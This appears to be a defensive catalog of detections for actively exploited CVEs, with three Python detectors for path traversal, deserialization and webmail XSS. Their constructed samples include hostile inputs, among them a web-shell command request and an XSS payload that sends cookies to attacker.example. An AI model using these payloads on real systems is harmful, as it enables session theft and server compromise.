vendor: Laravel product: Livewire cwe: CWE-94 disclosed: Mar 20, 2026 cvss: unscored · write-up soon
- CVE-2026-20131 KEV
Cisco FMC/SCC Deserialization RCE Exploitation (CVE-2026-20131)
Detects exploitation of CVE-2026-20131, a deserialization of untrusted data vulnerability in Cisco Secure Firewall Management Center (FMC) and Cisco Security Cloud Control (SCC) Firewall Management. Successful exploitation allows unauthenticated or authenticated remote attackers to execute arbitrary commands on the underlying OS. This CVE is listed in CISA's Known Exploited Vulnerabilities catalog.
vendor: Cisco product: Secure Firewall Management Center (FMC) cwe: CWE-502 disclosed: Mar 19, 2026 cvss: unscored · write-up soon
- CVE-2025-66376 KEV
Zimbra Collaboration Suite (ZCS) Cross-Site Scripting (XSS) Exploitation
Detects exploitation attempts targeting CVE-2025-66376, a cross-site scripting vulnerability in Synacor Zimbra Collaboration Suite (ZCS). This KEV-listed vulnerability allows attackers to inject malicious scripts into the Zimbra web interface, potentially leading to session hijacking, credential theft, or further compromise of email infrastructure. Active exploitation has been confirmed by CISA.
vendor: Synacor product: Zimbra Collaboration Suite (ZCS) cwe: CWE-79 disclosed: Mar 18, 2026 cvss: unscored · write-up soon
- CVE-2026-20963 KEV
Microsoft SharePoint Deserialization of Untrusted Data (CVE-2026-20963)
Detects exploitation of CVE-2026-20963, a deserialization of untrusted data vulnerability in Microsoft SharePoint. Attackers can send crafted serialized payloads to SharePoint endpoints, leading to remote code execution in the context of the SharePoint application pool. This CVE is listed on the CISA KEV catalog, indicating active exploitation in the wild.
vendor: Microsoft product: SharePoint cwe: CWE-502 disclosed: Mar 18, 2026 cvss: unscored · write-up soon
- CVE-2025-47813 KEV
Wing FTP Server Information Disclosure via Error Messages (CVE-2025-47813)
Detects potential exploitation of CVE-2025-47813, an information disclosure vulnerability in Wing FTP Server (CWE-209) where detailed error messages expose sensitive server-side information. This vulnerability is actively exploited in the wild (CISA KEV). Attackers may probe the FTP server with malformed or unexpected requests to trigger verbose error responses revealing internal paths, software versions, configuration details, or stack traces.
vendor: Wing FTP Server product: Wing FTP Server cwe: CWE-209 disclosed: Mar 16, 2026 cvss: unscored · write-up soon
- CVE-2026-3909 KEV
Google Skia Out-of-Bounds Write (CVE-2026-3909)
Detects exploitation attempts targeting CVE-2026-3909, an out-of-bounds write vulnerability in Google Skia graphics library. Skia is embedded in Chrome and other Google products. Exploitation can lead to arbitrary code execution via crafted web content or malicious files. This vulnerability is confirmed exploited in the wild (CISA KEV).
vendor: Google product: Skia cwe: CWE-787 disclosed: Mar 13, 2026 cvss: unscored · write-up soon
- CVE-2026-3910 KEV
CVE-2026-3910: Google Chromium V8 Memory Buffer Bounds Violation
Detects exploitation attempts and post-exploitation indicators related to CVE-2026-3910, an improper restriction of operations within the bounds of a memory buffer (CWE-119) in Google Chromium's V8 JavaScript engine. This vulnerability is actively exploited in the wild (CISA KEV) and may allow attackers to achieve remote code execution via a malicious web page, potentially leading to sandbox escape and full system compromise.
vendor: Google product: Chromium V8 cwe: CWE-119 disclosed: Mar 13, 2026 cvss: unscored · write-up soon
- CVE-2025-68613 KEV
n8n Improper Control of Dynamically-Managed Code Resources (CVE-2025-68613)
Detects exploitation of CVE-2025-68613, a critical vulnerability in n8n workflow automation platform where improper control of dynamically-managed code resources (CWE-913) allows attackers to execute arbitrary code. This vulnerability is actively exploited in the wild (CISA KEV). Attackers can abuse n8n's Code node or expression evaluation engine to break out of intended sandboxing and execute arbitrary system commands on the underlying host.
vendor: n8n product: n8n cwe: CWE-913 disclosed: Mar 11, 2026 cvss: unscored · write-up soon
- CVE-2021-22054 KEV
Omnissa Workspace ONE UEM Server-Side Request Forgery (CVE-2021-22054)
Detects exploitation of CVE-2021-22054, a Server-Side Request Forgery (SSRF) vulnerability in Omnissa (formerly VMware) Workspace ONE UEM. An unauthenticated attacker can send crafted HTTP requests to the UEM server, causing it to make arbitrary outbound HTTP/HTTPS requests to internal or external resources. This can be leveraged to scan internal networks, access cloud metadata services (e.g., AWS IMDS), or pivot to internal services not directly reachable by the attacker. The vulnerability is listed in CISA's Known Exploited Vulnerabilities catalog.
vendor: Omnissa product: Workspace ONE UEM cwe: CWE-918 disclosed: Mar 9, 2026 cvss: unscored · write-up soon
- CVE-2025-26399 KEV
SolarWinds Web Help Desk Deserialization of Untrusted Data (CVE-2025-26399)
CVE-2025-26399 is a deserialization of untrusted data vulnerability (CWE-502) in SolarWinds Web Help Desk. Exploitation allows remote attackers to execute arbitrary code by sending maliciously crafted serialized Java objects to the application. This vulnerability is listed in CISA's Known Exploited Vulnerabilities catalog, indicating active exploitation in the wild. SolarWinds Web Help Desk is widely deployed in enterprise and government environments for IT service management, making this a high-priority target for threat actors seeking privileged network access.
vendor: SolarWinds product: Web Help Desk cwe: CWE-502 disclosed: Mar 9, 2026 cvss: unscored · write-up soon
- CVE-2026-1603 KEV
Ivanti Endpoint Manager (EPM) Authentication Bypass (CVE-2026-1603)
CVE-2026-1603 is an authentication bypass vulnerability (CWE-288) in Ivanti Endpoint Manager (EPM). This KEV-listed vulnerability allows unauthenticated attackers to bypass authentication mechanisms and gain unauthorized access to the EPM management interface. Successful exploitation may lead to full compromise of managed endpoints, lateral movement, and deployment of malicious software across the enterprise.
vendor: Ivanti product: Endpoint Manager (EPM) cwe: CWE-288 disclosed: Mar 9, 2026 cvss: unscored · write-up soon
- CVE-2017-7921 KEV
Hikvision Improper Authentication Exploitation (CVE-2017-7921)
Detects exploitation attempts targeting CVE-2017-7921, an improper authentication vulnerability (CWE-287) in Hikvision IP cameras and multiple products. This vulnerability allows unauthenticated attackers to bypass authentication and gain unauthorized access to camera streams, configurations, and credentials by manipulating URL parameters. Listed on CISA KEV, indicating active exploitation in the wild. Attackers commonly use this to gain persistent access to surveillance infrastructure, pivot within networks, or exfiltrate sensitive footage.
vendor: Hikvision product: Multiple Products cwe: CWE-287 disclosed: Mar 5, 2026 cvss: unscored · write-up soon
- CVE-2021-22681 KEV
Rockwell Automation Logix Controllers Insufficient Credential Protection (CVE-2021-22681)
CVE-2021-22681 is an insufficient protection of credentials vulnerability (CWE-522) affecting Rockwell Automation multiple products including Logix controllers. An attacker can intercept or obtain weakly protected credentials used to authenticate with Logix controllers, enabling authentication bypass. This vulnerability is listed in CISA's Known Exploited Vulnerabilities catalog and poses critical risk in OT/ICS environments where unauthorized controller access could cause process disruption or physical damage.
vendor: Rockwell product: Multiple Products cwe: CWE-522 disclosed: Mar 5, 2026 cvss: unscored · write-up soon
- CVE-2021-30952 KEV
CVE-2021-30952: Apple Multiple Products Integer Overflow Exploitation
Detects exploitation attempts of CVE-2021-30952, an integer overflow vulnerability in Apple Multiple Products. This vulnerability is listed in CISA's Known Exploited Vulnerabilities catalog, indicating active exploitation in the wild. Integer overflow conditions in Apple platform components can lead to memory corruption, arbitrary code execution, or privilege escalation.
vendor: Apple product: Multiple Products cwe: CWE-190 disclosed: Mar 5, 2026 cvss: unscored · write-up soon
- CVE-2023-41974 KEV
Apple iOS/iPadOS Use-After-Free Exploitation (CVE-2023-41974)
Detects exploitation attempts and post-exploitation activity related to CVE-2023-41974, a use-after-free vulnerability in Apple iOS and iPadOS. This vulnerability allows an attacker to achieve arbitrary code execution, potentially leading to full device compromise. It is listed in CISA's Known Exploited Vulnerabilities catalog, indicating active exploitation in the wild. Detection focuses on mobile device management telemetry, abnormal process behavior on managed Apple devices, and network indicators associated with mobile exploit frameworks.
vendor: Apple product: iOS and iPadOS cwe: CWE-416 disclosed: Mar 5, 2026 cvss: unscored · write-up soon
- CVE-2023-43000 KEV
Apple Multiple Products Use-After-Free Vulnerability (CVE-2023-43000)
Detects exploitation of CVE-2023-43000, a use-after-free vulnerability (CWE-416) affecting multiple Apple products. This vulnerability is listed in CISA's Known Exploited Vulnerabilities catalog, indicating active exploitation in the wild. Use-after-free conditions in Apple system components can allow attackers to execute arbitrary code, escalate privileges, or achieve kernel-level compromise on affected macOS, iOS, and related platforms.
vendor: Apple product: Multiple Products cwe: CWE-416 disclosed: Mar 5, 2026 cvss: unscored · write-up soon
- CVE-2026-22719 KEV
CVE-2026-22719: VMware Aria Operations Command Injection
Detects exploitation of CVE-2026-22719, a command injection vulnerability (CWE-77) in Broadcom VMware Aria Operations. This KEV-listed vulnerability allows attackers to inject and execute arbitrary OS commands through unsanitized input, potentially leading to full host compromise, lateral movement, and persistence within virtualized environments.
vendor: Broadcom product: VMware Aria Operations cwe: CWE-77 disclosed: Mar 3, 2026 cvss: unscored · write-up soon
- CVE-2022-20775 KEV
CVE-2022-20775 — Cisco SD-WAN Path Traversal Exploitation Attempt
Detects exploitation attempts targeting CVE-2022-20775, a path traversal vulnerability (CWE-25, CWE-282) in Cisco SD-WAN software. Successful exploitation may allow an authenticated attacker to read or write arbitrary files on the underlying operating system, potentially leading to privilege escalation or persistent access. This CVE is listed in CISA's Known Exploited Vulnerabilities catalog.
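The path-traversal entries in this list (Kentico Xperience, CVE-2025-2749, where traversal is paired with an unrestricted upload, and Cisco SD-WAN, CVE-2022-20775, where it reaches arbitrary files on the underlying OS) describe the same log footprint. The Python below is an added illustration of that footprint and is not the KQL/SPL logic this catalog ships nor code from either vendor. It walks constructed web-server access-log lines (the `/cms/...` endpoint names, the upload root and the client addresses are invented), percent-decodes each request until it is stable so double-encoded `..%252F` sequences are seen for what they are, flags parameters that resolve outside the assumed upload root, flags POSTed filenames with server-executable extensions, and then correlates a later GET for the same basename, which is what a dropped web shell looks like in the log.

```python
import re
from posixpath import basename, normpath, splitext
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed access-log lines for a hypothetical CMS; endpoints and addresses are invented.
SAMPLE_LOG = """\
10.0.0.5 - - [20/Apr/2026:10:01:02 +0000] "GET /cms/getfile?name=logo.png HTTP/1.1" 200 512
10.0.0.9 - - [20/Apr/2026:10:01:07 +0000] "GET /cms/getfile?name=..%2F..%2Fweb.config HTTP/1.1" 200 1024
198.51.100.7 - - [20/Apr/2026:10:02:11 +0000] "POST /cms/upload?name=..%252F..%252Fcms%252Fshell.aspx HTTP/1.1" 201 77
198.51.100.7 - - [20/Apr/2026:10:02:30 +0000] "GET /cms/shell.aspx?cmd=whoami HTTP/1.1" 200 30
10.0.0.5 - - [20/Apr/2026:10:03:00 +0000] "POST /cms/upload?name=report.pdf HTTP/1.1" 201 90
"""

LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
UPLOAD_ROOT = "/cms/media"   # assumed directory uploads are meant to land in
EXEC_EXT = {".aspx", ".ashx", ".asmx", ".php", ".jsp", ".jspx"}


def full_decode(s, rounds=3):
    """Percent-decode until stable (bounded) so %252e%252e%252f is seen as ../."""
    for _ in range(rounds):
        d = unquote(s)
        if d == s:
            break
        s = d
    return s.replace("\\", "/")


def escapes_root(value, root=UPLOAD_ROOT):
    """True when joining value under root resolves to a path outside root."""
    if value.startswith("/"):
        return True
    joined = normpath(root + "/" + value)
    return not (joined == root or joined.startswith(root + "/"))


def inspect_request(method, target):
    """Return (reasons, uploaded_name): reasons describe traversal/upload abuse,
    uploaded_name is the basename of a flagged executable upload, else None."""
    reasons, uploaded_name = [], None
    parts = urlsplit(target)
    path = full_decode(parts.path)
    if "../" in path:
        reasons.append("traversal sequence in URL path")
    for key, raw in parse_qsl(parts.query, keep_blank_values=True):
        value = full_decode(raw)            # parse_qsl decoded one layer; peel the rest
        if escapes_root(value):
            reasons.append(f"parameter {key!r} escapes upload root: {value}")
        ext = splitext(value)[1].lower()
        if method == "POST" and ext in EXEC_EXT:
            reasons.append(f"upload of server-executable type {ext} via {key!r}")
            uploaded_name = basename(value)
    return reasons, uploaded_name


def detect(log_text):
    """Scan a log; return [(line_no, client, reasons)] for suspicious requests."""
    findings, uploaded = [], {}         # uploaded: basename -> line of the flagged upload
    for n, line in enumerate(log_text.splitlines(), 1):
        m = LOG_RE.match(line)
        if not m:
            continue
        reasons, name = inspect_request(m["method"], m["target"])
        if name:
            uploaded[name] = n
        served = basename(full_decode(urlsplit(m["target"]).path))
        if m["method"] == "GET" and served in uploaded:
            reasons.append(f"request for {served} first uploaded on line {uploaded[served]}")
        if reasons:
            findings.append((n, m["client"], reasons))
    return findings


if __name__ == "__main__":
    for n, client, reasons in detect(SAMPLE_LOG):
        print(f"line {n} {client}: " + "; ".join(reasons))
```

The correlation step is the part worth carrying into a real rule: a single traversal-looking parameter is noisy, but an executable upload followed by a request for that filename from the same client is close to a confirmed web shell.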
vendor: Cisco product: SD-WAN cwe: CWE-25, CWE-282 disclosed: Feb 25, 2026 cvss: unscored · write-up soon
- CVE-2026-20127 KEV
Cisco Catalyst SD-WAN Controller and Manager Authentication Bypass (CVE-2026-20127)
CVE-2026-20127 is an authentication bypass vulnerability (CWE-287) affecting Cisco Catalyst SD-WAN Controller and Manager. A remote, unauthenticated attacker may exploit improper authentication mechanisms to gain unauthorized access to the management plane. This vulnerability is actively exploited in the wild per CISA KEV and is subject to Emergency Directive ED-26-03.
vendor: Cisco product: Catalyst SD-WAN Controller and Manager cwe: CWE-287 disclosed: Feb 25, 2026 cvss: unscored · write-up soon
- CVE-2026-25108 KEV
Soliton FileZen OS Command Injection Exploitation (CVE-2026-25108)
Detects exploitation of CVE-2026-25108, an OS command injection vulnerability (CWE-78) in the Soliton Systems K.K. FileZen file-sharing appliance. This vulnerability is listed on CISA's Known Exploited Vulnerabilities catalog and allows unauthenticated or authenticated attackers to inject arbitrary OS commands through vulnerable input fields, potentially leading to full system compromise.
vendor: Soliton Systems K.K. product: FileZen cwe: CWE-78 disclosed: Feb 24, 2026 cvss: unscored · write-up soon
- CVE-2025-49113 KEV
Roundcube Webmail Deserialization of Untrusted Data (CVE-2025-49113)
CVE-2025-49113 is an actively exploited deserialization of untrusted data vulnerability (CWE-502) in Roundcube Webmail. When exploited, an attacker can send a specially crafted serialized PHP object via the web interface, leading to remote code execution on the underlying server. This vulnerability is listed in CISA's Known Exploited Vulnerabilities catalog and requires immediate patching to versions 1.5.10 or 1.6.11.
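Several entries above hinge on the same request-time observable: a serialized object arriving where the application expects plain data (Exchange CVE-2023-21529, Cisco FMC CVE-2026-20131, SharePoint CVE-2026-20963 and SolarWinds Web Help Desk CVE-2025-26399 on the .NET and Java side, Roundcube CVE-2025-49113 on the PHP side). The Python below is an added example of spotting those payloads in a form body; it is not the catalog's detection logic or any vendor's code. The format constants are real (the Java `ObjectOutputStream` stream header `AC ED 00 05`, the .NET BinaryFormatter `SerializationHeaderRecord` prefix, and PHP's `O:<len>:"Class":<n>:{` syntax); the request bodies, parameter names and class names are constructed. Base64-wrapped and gzip-wrapped Java streams are handled because both are common ways the magic bytes get hidden.

```python
import base64
import gzip
import re
import zlib
from urllib.parse import parse_qsl, urlencode

JAVA_MAGIC = b"\xac\xed\x00\x05"                                  # java.io.ObjectOutputStream header
DOTNET_BF_HEADER = b"\x00\x01\x00\x00\x00\xff\xff\xff\xff\x01\x00\x00\x00"  # BinaryFormatter header record
PHP_OBJ_RE = re.compile(r'[OC]:\d+:"[A-Za-z0-9_\\]+":\d+:\{')      # e.g. O:8:"stdClass":1:{
B64_TOKEN_RE = re.compile(r"[A-Za-z0-9+/=_-]{16,}")                # candidate base64 runs


def _b64(token):
    """Decode standard or URL-safe base64, tolerating missing padding; None if invalid."""
    t = token.replace("-", "+").replace("_", "/")
    t += "=" * (-len(t) % 4)
    try:
        return base64.b64decode(t, validate=True)
    except ValueError:          # binascii.Error is a ValueError subclass
        return None


def classify_bytes(data):
    """Name the serialization format a blob begins with (looking through gzip), or None."""
    if data[:2] == b"\x1f\x8b":
        try:   # inflate only the first few dozen bytes: enough for the magic, safe against bombs
            data = zlib.decompressobj(16 + zlib.MAX_WBITS).decompress(data, 64)
        except zlib.error:
            return None
    if data.startswith(JAVA_MAGIC):
        return "java-serialized"
    if data.startswith(DOTNET_BF_HEADER):
        return "dotnet-binaryformatter"
    return None


def scan_text(text):
    """Indicators of serialized-object payloads in one decoded parameter value."""
    hits = set()
    if PHP_OBJ_RE.search(text):
        hits.add("php-serialized-object")
    for token in B64_TOKEN_RE.findall(text):
        raw = _b64(token)
        kind = classify_bytes(raw) if raw else None
        if kind:
            hits.add(kind)
    return hits


def scan_request(body):
    """Scan a URL-encoded form body; return {parameter: indicators} for parameters with hits."""
    findings = {}
    for key, value in parse_qsl(body, keep_blank_values=True):
        hits = scan_text(value)
        if hits:
            findings[key] = hits
    return findings


def sample_bodies():
    """Constructed request bodies, not captured traffic."""
    java = base64.b64encode(JAVA_MAGIC + b"sr\x00\x11java.util.HashMap").decode()
    dotnet = base64.b64encode(DOTNET_BF_HEADER + b"\x00\x00\x00\x00\x0c").decode()
    gz = base64.urlsafe_b64encode(gzip.compress(JAVA_MAGIC + b"sr\x00\x0fjava.util.Stack")).decode()
    php = 'O:8:"stdClass":1:{s:3:"cmd";s:2:"id";}'
    return {
        "benign": urlencode({"q": "hello world", "page": "2",
                             "token": "3f9ab2c44e1d8f0a9b7c6d5e4f3a2b1c"}),
        "java": urlencode({"data": java}),
        "dotnet": urlencode({"payload": dotnet}),
        "php": urlencode({"_token": "abc", "prefs": php}),
        "gzjava": urlencode({"state": gz}),
    }


if __name__ == "__main__":
    for label, body in sample_bodies().items():
        print(f"{label:7} -> {scan_request(body) or 'clean'}")
```

Two tuning notes: legitimate ASP.NET `__VIEWSTATE` and JSF state fields carry their own (different) headers, so the check above will not fire on them, and a base64 run that decodes cleanly but starts with neither header is deliberately ignored rather than reported as "unknown binary", which keeps the rule quiet on ordinary tokens and hashes.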
vendor: Roundcube product: Webmail cwe: CWE-502 disclosed: Feb 20, 2026 cvss: unscored · write-up soon
- CVE-2025-68461 KEV
Roundcube Webmail Cross-Site Scripting (XSS) Exploitation Attempt
Detects exploitation attempts targeting CVE-2025-68461, a stored/reflected cross-site scripting vulnerability in Roundcube Webmail. This vulnerability, listed in CISA's Known Exploited Vulnerabilities catalog, allows attackers to inject malicious scripts via email content, potentially leading to session hijacking, credential theft, or further compromise of the mail server environment. Affected versions include Roundcube Webmail prior to 1.5.12 and 1.6.12.
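The three webmail XSS entries in this list (Zimbra CVE-2025-48700 and CVE-2025-66376, Roundcube CVE-2025-68461) all come down to script reaching the client through HTML mail that the sanitizer let through. The Python below is an added auditor for that content, not Zimbra's or Roundcube's sanitizer and not the catalog's detection. It uses the standard-library `html.parser` and runs over constructed message bodies (the addresses and hostnames are invented). The interesting cases are the evasions: an entity-encoded `javascript:` scheme, a tab inside the scheme, an attribute-only `<svg/onload>` with no spaces, and CSS `expression()`, each of which a naive substring check for `<script>` misses.

```python
import re
from html.parser import HTMLParser

DANGEROUS_TAGS = {"script", "iframe", "object", "embed", "meta", "base", "form"}
URL_ATTRS = {"href", "src", "action", "formaction", "xlink:href", "data", "background"}
_STRIP = re.compile(r"[\s\x00-\x1f]+")   # whitespace/control bytes browsers ignore inside a scheme


def _script_url(value):
    v = _STRIP.sub("", value).lower()
    return v.startswith(("javascript:", "vbscript:", "data:text/html"))


class XssAudit(HTMLParser):
    """Collect markup a webmail client must not render from an untrusted message."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.findings = []

    def handle_starttag(self, tag, attrs):   # also invoked for self-closing tags
        if tag in DANGEROUS_TAGS:
            self.findings.append(f"<{tag}> element")
        for name, value in attrs:            # attribute values arrive entity-decoded
            value = value or ""
            if name.startswith("on"):
                self.findings.append(f"event handler {name} on <{tag}>")
            elif name in URL_ATTRS and _script_url(value):
                self.findings.append(f"script URL in {name} on <{tag}>")
            elif name == "style" and re.search(r"expression\(|javascript:", _STRIP.sub("", value), re.I):
                self.findings.append(f"dangerous CSS in style on <{tag}>")


def audit_html(html):
    """Return the list of findings for one HTML body (empty list means nothing flagged)."""
    p = XssAudit()
    p.feed(html)
    p.close()
    return p.findings


# Constructed message bodies, not real mail.
SAMPLES = {
    "newsletter": '<p>Hello <b>Alice</b>, see <a href="https://example.com/news">this</a>.</p>'
                  '<img src="https://example.com/a.png" alt="">',
    "onerror": '<img src="x" onerror="fetch(\'https://attacker.example/c?\'+document.cookie)">',
    "entity_js": '<a href="&#106;avascript:alert(1)">click</a>',
    "tab_js": '<a href="jav\tascript:alert(document.domain)">click</a>',
    "svg_onload": '<svg/onload=alert(1)>',
    "style": '<div style="width:expression(alert(1))">x</div>',
}

if __name__ == "__main__":
    for label, body in SAMPLES.items():
        print(f"{label:10} -> {audit_html(body) or 'clean'}")
```

As a detection over mail flow this runs on the rendered HTML part of inbound messages; as a control it is the allow-list complement a sanitizer should enforce. Either way the decode-then-strip step before the scheme comparison is the part that matters, because the parser has already turned `&#106;` into `j` by the time the attribute reaches the handler.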
vendor: Roundcube product: Webmail cwe: CWE-79 disclosed: Feb 20, 2026 cvss: unscored · write-up soon
- CVE-2021-22175 KEV
GitLab SSRF Exploitation (CVE-2021-22175)
Detects exploitation of CVE-2021-22175, a Server-Side Request Forgery (SSRF) vulnerability in GitLab. An attacker can craft requests that cause the GitLab server to make HTTP requests to internal or external resources, potentially exposing cloud metadata endpoints, internal services, or facilitating lateral movement. This vulnerability is listed in CISA's Known Exploited Vulnerabilities catalog.
vendor: GitLab product: GitLab cwe: CWE-918 disclosed: Feb 18, 2026 cvss: unscored · write-up soon
- CVE-2026-22769 KEV
Dell RecoverPoint for Virtual Machines (RP4VMs) Hard-coded Credentials Exploitation
Detects exploitation of CVE-2026-22769, a hard-coded credentials vulnerability in Dell RecoverPoint for Virtual Machines (RP4VMs). Threat actors (including UNC6201) have actively exploited this zero-day to gain unauthorized access to RP4VMs appliances, enabling lateral movement, data exfiltration, and ransomware deployment within virtualized environments. The hard-coded credentials allow unauthenticated remote access to RP4VMs management interfaces.
vendor: Dell product: RecoverPoint for Virtual Machines (RP4VMs) cwe: CWE-798 disclosed: Feb 18, 2026 cvss: unscored · write-up soon
- CVE-2008-0015 KEV
Microsoft Windows Video ActiveX Control Remote Code Execution (CVE-2008-0015)
Detects exploitation attempts targeting the Microsoft Windows Video ActiveX Control vulnerability (CVE-2008-0015), addressed in MS09-032. The msvidctl.dll ActiveX control contains a memory corruption flaw that allows remote attackers to execute arbitrary code via a crafted web page. This vulnerability is listed in CISA's Known Exploited Vulnerabilities catalog and has been actively exploited in drive-by download campaigns.
vendor: Microsoft product: Windows disclosed: Feb 17, 2026 cvss: unscored · write-up soon
- CVE-2020-7796 KEV
Zimbra Collaboration Suite SSRF Exploitation (CVE-2020-7796)
Detects exploitation attempts targeting CVE-2020-7796, a Server-Side Request Forgery (SSRF) vulnerability in Synacor Zimbra Collaboration Suite (ZCS). This vulnerability allows unauthenticated remote attackers to make the Zimbra server issue arbitrary HTTP requests to internal or external resources, potentially enabling internal network scanning, credential theft, or pivoting to internal services.
vendor: Synacor product: Zimbra Collaboration Suite cwe: CWE-918 disclosed: Feb 17, 2026 cvss: unscored · write-up soon
- CVE-2024-7694 KEV
TeamT5 ThreatSonar Anti-Ransomware Unrestricted File Upload (CVE-2024-7694)
CVE-2024-7694 is an unrestricted file upload vulnerability (CWE-434) in TeamT5 ThreatSonar Anti-Ransomware. An attacker can upload files with dangerous types to the ThreatSonar management interface, potentially achieving remote code execution on the host running the security product. This vulnerability is listed in CISA's Known Exploited Vulnerabilities catalog, indicating active exploitation in the wild. Successful exploitation of a security product creates a high-impact scenario where the attacker may gain privileged access to the endpoint security management plane.
vendor: TeamT5 product: ThreatSonar Anti-Ransomware cwe: CWE-434 disclosed: Feb 17, 2026 | unscored | write-up soon
- CVE-2026-2441 KEV
CVE-2026-2441: Google Chromium CSS Use-After-Free Exploitation
Detects exploitation of CVE-2026-2441, a use-after-free vulnerability in the CSS engine of Google Chromium. This vulnerability is actively exploited in the wild (CISA KEV) and can allow remote code execution via a malicious web page. Detection focuses on abnormal Chromium renderer process behavior, suspicious child process spawning, and memory corruption indicators consistent with UAF exploitation.
vendor: Google product: Chromium cwe: CWE-416 disclosed: Feb 17, 2026 | unscored | write-up soon
- CVE-2024-43468 KEV
CVE-2024-43468: Microsoft Configuration Manager SQL Injection Exploitation
Detects exploitation attempts targeting CVE-2024-43468, a SQL injection vulnerability in Microsoft Configuration Manager (SCCM/ConfigMgr). This vulnerability allows unauthenticated attackers to execute arbitrary SQL commands against the ConfigMgr site database, potentially leading to remote code execution, credential theft, and lateral movement within the environment. It is listed in CISA KEV, indicating active exploitation in the wild.
vendor: Microsoft product: Configuration Manager cwe: CWE-89 disclosed: Feb 12, 2026 | unscored | write-up soon
- CVE-2025-15556 KEV
Notepad++ Download of Code Without Integrity Check (CVE-2025-15556)
CVE-2025-15556 is a CWE-494 (Download of Code Without Integrity Check) vulnerability in Notepad++ that has been added to CISA's Known Exploited Vulnerabilities catalog. The vulnerability allows an attacker to deliver malicious code through Notepad++'s update or plugin mechanism without cryptographic integrity verification, enabling arbitrary code execution in the context of the user running Notepad++. This is actively exploited in the wild and should be treated as high-priority for endpoint detection and response.
vendor: Notepad++ product: Notepad++ cwe: CWE-494 disclosed: Feb 12, 2026 | unscored | write-up soon
- CVE-2025-40536 KEV
SolarWinds Web Help Desk Security Control Bypass (CVE-2025-40536)
Detects exploitation of CVE-2025-40536, a security control bypass vulnerability (CWE-693) in SolarWinds Web Help Desk. This vulnerability is actively exploited in the wild (CISA KEV) and allows attackers to bypass authentication or authorization controls within the Web Help Desk application. Successful exploitation may enable unauthorized access to ticketing data, credential stores, or administrative functions.
vendor: SolarWinds product: Web Help Desk cwe: CWE-693 disclosed: Feb 12, 2026 | unscored | write-up soon
- CVE-2026-20700 KEV
Apple Multiple Products Buffer Overflow Exploitation (CVE-2026-20700)
Detects exploitation attempts and post-exploitation activity related to CVE-2026-20700, a buffer overflow vulnerability (CWE-119) affecting multiple Apple products. This vulnerability is listed in CISA's Known Exploited Vulnerabilities catalog, indicating active exploitation in the wild. Buffer overflow exploitation against Apple platforms may result in arbitrary code execution, privilege escalation, or sandbox escape.
vendor: Apple product: Multiple Products cwe: CWE-119 disclosed: Feb 12, 2026 | unscored | write-up soon
- CVE-2026-21510 KEV
CVE-2026-21510: Microsoft Windows Shell Protection Mechanism Failure
Detects exploitation of CVE-2026-21510, a Microsoft Windows Shell protection mechanism failure (CWE-693) that allows attackers to bypass security controls enforced by the Windows Shell. This vulnerability is actively exploited in the wild (CISA KEV). Attackers may abuse this flaw to execute unauthorized code, bypass security prompts, or escalate privileges via crafted shell interactions.
vendor: Microsoft product: Windows cwe: CWE-693 disclosed: Feb 10, 2026 | unscored | write-up soon
- CVE-2026-21513 KEV
CVE-2026-21513 — Microsoft MSHTML Framework Protection Mechanism Failure
Detects exploitation of CVE-2026-21513, a protection mechanism failure (CWE-693) in the Microsoft MSHTML framework on Windows. This KEV-listed vulnerability allows attackers to bypass security controls implemented in MSHTML, potentially enabling code execution via crafted web content processed by Internet Explorer compatibility components, Microsoft Office documents embedding web content, or applications using the WebBrowser control. Active exploitation has been confirmed by CISA.
vendor: Microsoft product: Windows cwe: CWE-693 disclosed: Feb 10, 2026 | unscored | write-up soon
- CVE-2026-21514 KEV
Microsoft Office Word Reliance on Untrusted Inputs in Security Decision (CVE-2026-21514)
Detects exploitation of CVE-2026-21514, a Microsoft Office Word vulnerability classified as CWE-807 (Reliance on Untrusted Inputs in a Security Decision). This flaw allows attackers to manipulate security-relevant decisions in Word by supplying crafted untrusted input, potentially bypassing security controls such as Protected View, macro policy enforcement, or document trust decisions. This CVE is listed on the CISA KEV catalog, indicating active exploitation in the wild.
vendor: Microsoft product: Office cwe: CWE-807 disclosed: Feb 10, 2026 | unscored | write-up soon
- CVE-2026-21519 KEV
Microsoft Windows Type Confusion Vulnerability (CVE-2026-21519)
Detects exploitation of CVE-2026-21519, a type confusion vulnerability (CWE-843) in Microsoft Windows. Type confusion vulnerabilities occur when code allocates or initializes a resource using one type but accesses it using an incompatible type, leading to out-of-bounds memory access, arbitrary code execution, or privilege escalation. This CVE is listed on the CISA Known Exploited Vulnerabilities catalog, indicating active exploitation in the wild.
vendor: Microsoft product: Windows cwe: CWE-843 disclosed: Feb 10, 2026 | unscored | write-up soon
- CVE-2026-21525 KEV
CVE-2026-21525 - Microsoft Windows NULL Pointer Dereference Exploitation
Detects exploitation attempts and post-exploitation activity related to CVE-2026-21525, a NULL pointer dereference vulnerability in Microsoft Windows. This vulnerability is actively exploited in the wild (CISA KEV) and may allow attackers to achieve privilege escalation or code execution via memory corruption techniques targeting Windows kernel or user-mode components.
vendor: Microsoft product: Windows cwe: CWE-476 disclosed: Feb 10, 2026 | unscored | write-up soon
- CVE-2026-21533 KEV
Microsoft Windows Improper Privilege Management (CVE-2026-21533)
Detects exploitation of CVE-2026-21533, a Microsoft Windows Improper Privilege Management vulnerability (CWE-269) listed in CISA's Known Exploited Vulnerabilities catalog. Successful exploitation allows a local attacker to elevate privileges on a compromised Windows system. Detection focuses on anomalous privilege token manipulation, unexpected service/process privilege escalation, and suspicious access patterns consistent with local privilege escalation techniques.
vendor: Microsoft product: Windows cwe: CWE-269 disclosed: Feb 10, 2026 | unscored | write-up soon
- CVE-2026-1731 KEV PoC
BeyondTrust Remote Support Pre-Auth Remote Code Execution
